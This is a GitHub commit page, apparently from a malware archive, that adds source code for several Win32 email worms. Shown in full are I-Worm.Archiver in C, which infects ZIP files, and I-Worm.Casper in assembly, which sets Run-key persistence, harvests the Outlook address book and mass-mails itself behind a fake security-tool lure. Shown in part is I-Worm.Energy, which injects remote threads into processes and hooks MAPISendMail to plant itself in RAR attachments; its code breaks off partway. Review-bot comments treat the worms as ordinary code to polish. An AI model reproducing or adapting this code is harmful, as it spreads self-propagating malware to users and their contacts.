
Add files via upload

This commit is contained in:
vxunderground 2020-10-09 22:25:52 -05:00 committed by GitHub
parent b7054dfedf
commit 4528c5fb12
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
23 changed files with 16566 additions and 0 deletions

Win32/Adrena.7z Normal file


Win32/ExploitKit.0x88.7z Normal file


1232
Win32/I-Worm.Alizee.asm Normal file


227
Win32/I-Worm.Archiver.c Normal file

@ -0,0 +1,227 @@
/*
Name : I-Worm.Archiver
Author : PetiK
Date : Mai 10th 2002 -
Language : C++
Comments : Infect ZIP files which run with WINZIP.
We can also to do the same think with PowerArchiver:
powerarc -a -c4 archive.zip virus.exe
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#pragma argused
#pragma inline
char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
char *fnam[]={"news","support","info","newsletter","webmaster"};
char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
char attname[]="news_xxxxxxxx.exe";
LPTSTR cmdLine,ptr;
BOOL installed;
BYTE desktop[50],favoris[50],personal[50],winzip[50];
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD type=REG_SZ;
long i;
LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
WIN32_FIND_DATA ffile;
void infzip(char *);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
GetModuleFileName(hInst,filen,100);
GetSystemDirectory((char *)sysdir,100);
GetWindowsDirectory((char *)copyn,100);
strcpy(windir,copyn);
strcat(copyn,"\\Archiver.exe");
installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'p':
ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
"I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
ExitProcess(0);
break;
}
}
}
if(!installed) {
CopyFile(filen,copyn,FALSE);
strcpy(copyreg,copyn);
strcat(copyreg," -i");
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg); */
ExitProcess(0);
}
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
RegCloseKey(hReg);
if(strlen(winzip)!=0) {
infzip(windir);
infzip(sysdir);
infzip(desktop);
infzip(personal);
infzip(favoris);
infzip("C:\\");
}
/*
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
for(i=0;i<8;i++)
attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
fsubj[0]=0;
wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
mes->ulReserved=0;
mes->lpszSubject=fsubj;
mes->lpszNoteText="This is some news send by our firm about security.\n"
"Please read by clicking on attached file.\n"
"\tBest Regards";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filen;
mes->lpFiles->lpszFileName=attname;
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
*/
ExitProcess(0);
}
void infzip(char *folder)
{
register bool abc=TRUE;
register HANDLE fh;
if(strlen(folder)!=0) {
SetCurrentDirectory(folder);
fh=FindFirstFile("*.zip",&ffile);
if(fh!=INVALID_HANDLE_VALUE) {
while(abc) {
inzip[0]=0;
wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
WinExec(inzip,1);
abc=FindNextFile(fh,&ffile);
}
}
}
}
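Review bot: The header comment (`Comments : Infect ZIP files which run with WINZIP.`) together with the `mapi.h` include and the MAPI function pointers implies a mail-spreading component and registry persistence, but it does not say that both the `RegSetValueEx` Run-key block and the entire MAPI block (from the `_asm` connectivity loop through `FreeLibrary(hMAPI)`) are commented out in this revision, so a reader triaging the file expects artefacts this build never produces. From the uncommented code the only persistent artefacts are the copy at `%windir%\Archiver.exe` (the `copyn` buffer) and the `*.zip` files that `infzip` rewrites through the WinZip command line. Suggest adding a header line such as `Comments : Run-key persistence and the MAPI mail routine are disabled (commented out) in this version; only the WinZip archive infection is active.`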

1555
Win32/I-Worm.BigBrother.asm Normal file


510
Win32/I-Worm.Casper.asm Normal file

@ -0,0 +1,510 @@
;--- dllz.def
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
;---
comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size : 6144 byte (compressed with UPX tool)
Action : Copy itself to
* WINDOWS\MsWinsock32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Winsock32 1.0 = WINDOWS\MsWinsock32.exe
To build the worm:
tasm32 /ml /m9 Casper
tlink32 -Tpe -c -x -aa Casper,,,import32,dllz
upx -9 Casper.exe
To delete the worm:
del %windir%\MsWinsock32.exe
del %windir%\CasperEMail.txt
dllz.def file:
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
Main_Worm:
call Hide_Worm
call Copy_Worm
call Check_Wsock
call Prepare_Spread_Worm
Connected_:
push 00h
push offset Tmp
callx InternetGetConnectedState
dec eax
jnz Connected_
mov edi,offset casper_mail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"saC\"
stosd
mov eax,"Erep"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call Spread_Worm
Hide_Worm proc
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz End_Hide
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz End_Hide
push 1
push 0
call ecx
End_Hide:
popad
ret
Hide_Worm endp
Check_Wsock proc
Search_Wsock:
push 50
mov edi,offset wsock_file
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"osW\"
stosd
mov eax,"23kc"
stosd
mov eax,"lld."
stosd
xor eax,eax
stosd
push offset wsock_file
callx GetFileAttributesA
cmp eax,20h
jne End_Wsock
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset wsock_file
callx CreateFileA
mov wsckhdl,eax
File_Mapping:
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push wsckhdl
callx CreateFileMappingA
test eax,eax
jz Close_File
mov wsckmap,eax
xor eax,eax
push eax
push eax
push eax
push 06h
push wsckmap
callx MapViewOfFile
test eax,eax
jz Close_Map_File
mov esi,eax
mov wsckview,eax
Old_Infect:
mov verif,0
cmp word ptr [esi],"ZM"
jne UnmapView_File
cmp byte ptr [esi+12h],"z"
je Infected_By_Happy
cmp word ptr [esi+38h],"ll"
je Infected_By_Icecubes
jmp UnmapView_File
Infected_By_Happy:
push 10h
push offset warning
@pushsz "I-Worm.Happy coded by Spanska"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Infected_By_Icecubes:
push 10h
push offset warning
@pushsz "I-Worm.Icecubes coded by f0re"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Already_Infected:
inc verif
jmp UnmapViewOfFile
UnmapView_File:
push wsckview
callx UnmapViewOfFile
Close_Map_File:
push offset wsckmap
callx CloseHandle
Close_File:
push wsckhdl
callx CloseHandle
End_Wsock:
ret
Check_Wsock endp
Copy_Worm proc
pushad
Original_Name:
push 50
mov esi,offset original
push esi
push 0
callx GetModuleFileNameA
Copy_Name:
mov edi,offset copy_name
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'WsM\'
stosd
mov eax,'osni'
stosd
mov eax,'23kc'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
Reg_Registered:
push 08h
push edi
push 01h
@pushsz "Winsock32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
push 08h
@pushsz "PetiK - France - (c)2001"
push 01h
@pushsz "Author"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
push 08h
@pushsz "1.00"
push 01h
@pushsz "Version"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
popad
ret
Copy_Worm endp
Prepare_Spread_Worm proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\CasperMail.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
push 1
@pushsz "wscript C:\CasperMail.vbs"
callx WinExec
push 3 * 1000
callx Sleep
@pushsz "C:\CasperMail.vbs"
callx DeleteFileA
popad
ret
Prepare_Spread_Worm endp
Spread_Worm:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset casper_mail
callx CreateFileA
inc eax
test eax,eax
je End_Spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3
call Scan_Mail
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
End_Spread_worm:
popad
ret
Scan_Mail:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je Scan_Mail
call Send_Mail
jmp Scan_Mail
entr2: xor al,al
stosb
pop edi
jmp Scan_Mail
f_mail:
FIN: push 00h
callx ExitProcess
Send_Mail:
xor eax,eax
push eax
push eax
push eax
push offset Message
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== Main_Worm =====
wsock_file db 50 dup (0)
; ===== Check_Wsock =====
wsckhdl dd 0
wsckmap dd 0
wsckview dd 0
PEHeader dd 0
warning db "Warning : You're infected by",00h
verif dd ?
; ===== Copy_Worm =====
original db 50 dup (0)
copy_name db 50 dup (0)
; ===== Prepare_Spread_Worm =====
octets dd ?
; ===== Spread_Worm =====
m_addr db 128 dup (?)
casper_mail db 50 dup (0)
mail_name db "Casper_Tool.exe",00h
MAPIHdl dd 0
Tmp dd 0
subject db "Casper Tool Protect 1.00",00h
body db "Hi,",0dh,0ah
db "Look at this attachment...",0dh,0ah
db "This freeware alert you if you infected by "
db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah
db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah
db "The tool Casper v.1.00 scans this specific file and displays a message "
db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"Good Bye and have a nice day",00h
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset original
dd offset mail_name
dd ?
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
Search WIN32_FIND_DATA <>
end DEBUT
end
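Review bot: The `To delete the worm:` list in the header comment (two `del` lines) is incomplete relative to what `Copy_Worm` writes: the `Reg_Registered` block also sets the `Winsock32` value under `HKLM\Software\Microsoft\Windows\CurrentVersion\Run` (SHSetValueA with root 80000002h) and two values, `Author` and `Version`, under `HKCU\Software\CasperWorm` (SHSetValueA with root 80000001h), none of which the removal steps mention. The header's `Winsock32 1.0 = WINDOWS\MsWinsock32.exe` also does not match the value name actually pushed, which is `"Winsock32"`. Suggest extending the header with a line such as `Also remove the Run value "Winsock32" (HKLM) and the key HKCU\Software\CasperWorm` so the removal notes cover every artefact the code creates.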

1598
Win32/I-Worm.Chainsaw.asm Normal file


727
Win32/I-Worm.Energy.asm Normal file

@ -0,0 +1,727 @@
COMMENT #
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ I-Worm.Energy ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
hey all...
ÄÄÄÄÄÄÄÄÄÄÄ
it was one b0ring sunday, when I decided to code some small and kewl virus...
I was tired from coding large projectz (HIV, XTC)... I wanted to code one
worm with some nice ideaz, like the Win2k.Stream.
and here it is. after some meditationz, full of experiencez from psychedelics
I decided to call this worm "Energy"... it is very small worm, spreading via
RAR filez. it can parse all processes, hook there MAPISendMail API procedure
and infect all attached RAR filez in a message by dropping itself to there.
very similar technique of the process'es address space manipulationz is
described in my article "Multi-process residency" and Win32.HIV virus. surely
it can't work on Win95/98 systemz. it worx on Windows 2000 OS, and (perhaps)
also on earlier versionz of Windows NT - but I don't know, I haven't tested it.
it can stay resident in memory as a service, by standard API callz, valid only
in NT systemz. while infecting the RAR archivez it addz itself to there under
the "SETUP.EXE" filename, containing also the standard setup icon. I tried to
optimize the source a bit... I know the worm is not super-small, but I it is
resident heavilly armoured very effective tiny mail-spreading worm.
the scheme of execution:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
after execution:
- anti-* stuff
- if initialized by SCM, run as a service process
- copy worm to system directory as "ENERGY.EXE"
- register worm as service process and run it everytime the OS will start
- enum processes, find MAPI32.dll there and hook MAPSendMail (using many
trics)
- wait one minute and again
hook_procedure:
- parse embedded filez and search for RAR filez.
- infect them by worm file: SETUP.EXE, mark as read-only (already-infected
mark).
the worm is encrypted/compressed by "tElock, version 0.51", one very nice
utility for armouring executable filez. this protector containz many nice
anti-* featurez. that's why I decided to use it. and also becoz I think guyz at
AVP can't handle this one.
it is possible that worm containz some bugz. yeah, but I don't care... I'm glad
I was able to finish it in 2 dayz and that it was not b0ring. I had a fun.
If you would like to consult anything with me, feel free to contact me...
(c) 14th November 2000 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Czech Republic ³ Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
#
.586p
.model flat ;blablabla
extrn GetLastError:PROC ;needed APIz
extrn EnumProcesses:PROC
extrn OpenProcess:PROC
extrn VirtualProtect:PROC
extrn VirtualAllocEx:PROC
extrn VirtualFreeEx:PROC
extrn CloseHandle:PROC
extrn CreateRemoteThread:PROC
extrn WriteProcessMemory:PROC
extrn Sleep:PROC
extrn WaitForSingleObject:PROC
extrn GetModuleHandleA:PROC
extrn GetProcAddress:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn GetModuleFileNameA:PROC
extrn GetFileSize:PROC
extrn ReadFile:PROC
extrn VirtualFree:PROC
extrn VirtualAlloc:PROC
extrn SetFilePointer:PROC
extrn SetFileAttributesA:PROC
extrn OpenMutexA:PROC
extrn ExitThread:PROC
extrn GetSystemDirectoryA:PROC
extrn CopyFileA:PROC
;extrn OpenServiceA:PROC
;extrn DeleteService:PROC ;***debug only!
extrn OpenSCManagerA:PROC
extrn CreateServiceA:PROC
extrn CloseServiceHandle:PROC
extrn StartServiceCtrlDispatcherA:PROC
extrn RegisterServiceCtrlHandlerA:PROC
extrn SetServiceStatus:PROC
include useful.inc ;include filez
include win32api.inc
PROC_COUNT equ 40*4 ;number of processes
.data
db ? ;some data
.code
Start: ;worm code starts here
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
e_name: @pushsz 'EnErGy'
push 0
push 1
call OpenMutexA ;check if mutex is
test eax,eax ;created, if not,
je end_seh ;we are prob. debugged
push eax
call CloseHandle ;close its handle
jmp SVCRegister ;logging as a service
e_svc: push 256
mov esi, offset worm_name
push esi
push 0
call GetModuleFileNameA ;get path+filename of
;the worm
mov edi,offset sys_dir
push edi
push 256
push edi
call GetSystemDirectoryA ;get windowz system dir.
add edi,eax
mov al,'\'
stosb
mov eax,'rene'
stosd
mov eax,'e.yg'
stosd
mov eax,'ex'
stosd ;construct path+filename
pop edi
push 0
push edi
push esi
call CopyFileA ;copy worm to sys. dir.
call SVCCreate ;register as a service
push api_num
pop ecx
call @api_table
dd offset GetModuleHandleA ;adressez of APIz
dd offset GetProcAddress
dd offset VirtualProtect
dd offset CreateFileA
dd offset CloseHandle
dd offset WriteFile
dd offset GetFileSize
dd offset ReadFile
dd offset VirtualFree
dd offset VirtualAlloc
dd offset SetFilePointer
dd offset SetFileAttributesA
api_num = 12
@api_table:
pop ebx
call @api_dest ;addressez of variablez
dd offset _gmha ;that will hold APIz
dd offset _gpa
dd offset _vp
dd offset _cfa
dd offset _ch
dd offset _wf
dd offset _gfs
dd offset _rf
dd offset _vf
dd offset _va
dd offset _sfp
dd offset _sfaa
@api_dest:
pop esi
get_apiz:
dec ecx ;decrement counter
mov eax,[ebx+ecx*4]
mov eax,[eax+2]
mov eax,[eax]
mov edx,[esi+ecx*4]
mov [edx],eax ;store API address
test ecx,ecx
jne get_apiz
worm_loop:
mov ebx,offset tmp
push ebx
push PROC_COUNT
mov esi,offset proc_dump
push esi
call EnumProcesses ;enum all processez
dec eax
jne end_seh
mov ecx,[ebx] ;try this PID
p_check:lodsd
call proc_infect ;try to infect it
add ecx,-3
loop p_check ;try next PID
worm_wait:
push 60000
call Sleep ;wait one minute
jmp worm_loop ;and try again.
;infect processez
proc_infect Proc
pushad
push eax
push 0
push 2 or 8 or 10h or 20h or 400h
call OpenProcess ;get handle to process
xchg eax,ecx
jecxz end_proc_infect
mov ebx,ecx
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virtual_end-Start
push 0
push ebx
call VirtualAllocEx ;allocate there memory
xchg eax,ecx ;for worm
jecxz end_proc_infect2
mov esi,ecx
push 0
push virtual_end-Start
push offset Start
push esi
push ebx
call WriteProcessMemory ;copy there worm body
dec eax
jne end_proc_infect3
lea edx,[esi+offset ThreadEntry-offset Start]
push eax
push eax
push eax
push edx
push eax
push eax
push ebx
call CreateRemoteThread ;create thread there
xchg eax,ecx
jecxz end_proc_infect3
push ecx
push -1
push ecx
call WaitForSingleObject ;wait for its termination
call CloseHandle ;and close its handle
jmp end_proc_infect2 ;and quit
end_proc_infect3:
push MEM_RELEASE
push 0
push esi
push ebx
call VirtualFreeEx ;release memory if failed
end_proc_infect2:
push ebx
call CloseHandle ;close handle to process
end_proc_infect:
popad
ret ;and quit
proc_infect EndP
;remote thread procedure
ThreadEntry Proc
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call gdelta
gdelta: pop ebp ;get delta offset
@pushsz 'MAPI32.dll'
mov eax,12345678h
_gmha = dword ptr $-4
call eax ;get address of MAPI32.dll
xchg eax,ecx
jecxz end_seh ;quit if not loaded
@pushsz 'MAPISendMail'
push ecx
mov eax,12345678h
_gpa = dword ptr $-4
call eax ;get address of
xchg eax,ecx ;MAPISendMail API
jecxz end_seh
mov esi,ecx ;to ESI
lea eax,[ebp + tmp - gdelta]
push eax
push PAGE_READWRITE
push 5
push esi
mov eax,12345678h
_vp = dword ptr $-4
call eax ;release page protection
xchg eax,ecx
jecxz end_seh
call hook_api ;hook the API
end_seh:@SEH_RemoveFrame ;remove SEH frame
popad ;and quit
ret
;proc for API hooking
hook_api:
mov [ebp + old_MAPI_addr - gdelta],esi
push esi
lea edi,[ebp + old_MAPI_api - gdelta]
movsd
movsb ;save first bytez of API
pop edi
mov ebx,edi
lea eax,[ebp + MAPI_hooker - gdelta]
sub ebx,eax
neg ebx
add ebx,-5
mov al,0E9h
stosb
xchg eax,ebx
stosd ;overwrite by JMP <worm_api>
ret
;the API hooker
MAPI_hooker:
push 12345678h
old_MAPI_addr = dword ptr $-4 ;save the address of API
pushad
mov edi,[esp.cPushad] ;get ptr to message
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push edi
mov ebx,[esp.cPushad.28]
mov ecx,[ebx+40] ;number of attachmentz
mov ebx,[ebx+44] ;ptr to file fieldz
f_parse:mov esi,[ebx+12]
lea edi,[ebp + arc_buffer - gdelta]
push edi
@copysz
dec edi
cmp byte ptr [edi-1],'\'
je over_slash
mov al,'\'
stosb
over_slash:
mov esi,[ebx+16]
@copysz
or [esi-5],20202020h ;lower case
cmp [esi-5],'rar.'
pop esi ;create path+filename
jne o_r ;quit if not RAR file
call infect_archive ;try to infect this file
o_r: sub ebx,-24
loop f_parse ;try another file in msg
pop edi
call @m_res
old_MAPI_api db 5 dup (90h)
@m_res: pop esi
movsd
movsb ;remove the API hooker
jmp end_seh ;and quit
;procedure for RAR archive infecting
infect_archive:
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call gd
gd: pop ebp ;get delta offset
lea eax,[ebp + worm_name - gd] ;get worm filename
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ
push eax
call [ebp + _cfa - gd] ;open worm file
inc eax
je end_seh
dec eax
mov [ebp + hFile - gd],eax ;save handle
push 0
push eax
mov eax,12345678h
_gfs = dword ptr $-4
call eax ;get its size
push eax
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push eax
push 0
mov eax,12345678h
_va = dword ptr $-4
call eax ;allocate enough memory
test eax,eax
pop edx
je end_file
xchg eax,ebx
push edx
push 0
lea eax,[ebp + tmp - gd]
push eax
push edx
push ebx
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_rf = dword ptr $-4 ;and copy there worm
call eax
call close_file ;close handle to file
pop edi
pushad
mov esi,ebx
call CRC32 ;calculate CRC32 of
mov [ebp + RARCRC32 - gd],eax ;the worm file
popad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ or GENERIC_WRITE
push esi
mov eax,12345678h
_cfa = dword ptr $-4
call eax ;open the archive
inc eax
je end_file2
dec eax
mov [ebp + hFile - gd],eax ;save its handle
push 2
push 0
push 0
push eax
mov eax,12345678h
_sfp = dword ptr $-4
call eax ;go to EOF
pushad
lea esi,[ebp + RARHeaderCRC+2 - gd]
push end_RAR-RARHeader-2
pop edi
call CRC32 ;calculate CRC32 of
mov [ebp + RARHeaderCRC - gd],ax ;the RAR file header
popad ;and save it
push 0
lea eax,[ebp + tmp - gd]
push eax
push end_RAR-RARHeader
call end_RAR
RARHeader: ;No comment ;)
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SETUP.EXE'
end_RAR:
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_wf = dword ptr $-4
call eax ;write RAR file header
push 0
lea eax,[ebp + tmp - gd]
push eax
push edi
push ebx
push dword ptr [ebp + hFile - gd]
call [ebp + _wf - gd] ;write the worm
end_file2:
push MEM_RELEASE
push 0
push ebx
mov eax,12345678h
_vf = dword ptr $-4
call eax ;release the memory
end_file:
call close_file ;close the archive
push FILE_ATTRIBUTE_READONLY
push esi
mov eax,12345678h
_sfaa = dword ptr $-4
call eax ;set READ-ONLY attribute
jmp end_seh ;and quit
close_file:
push 12345678h ;handle...
hFile = dword ptr $-4
mov eax,12345678h
_ch = dword ptr $-4
call eax ;close file handle
ret
CRC32 Proc
push ecx ;procedure for
push edx ;calculating CRC32s
push ebx ;at run-time
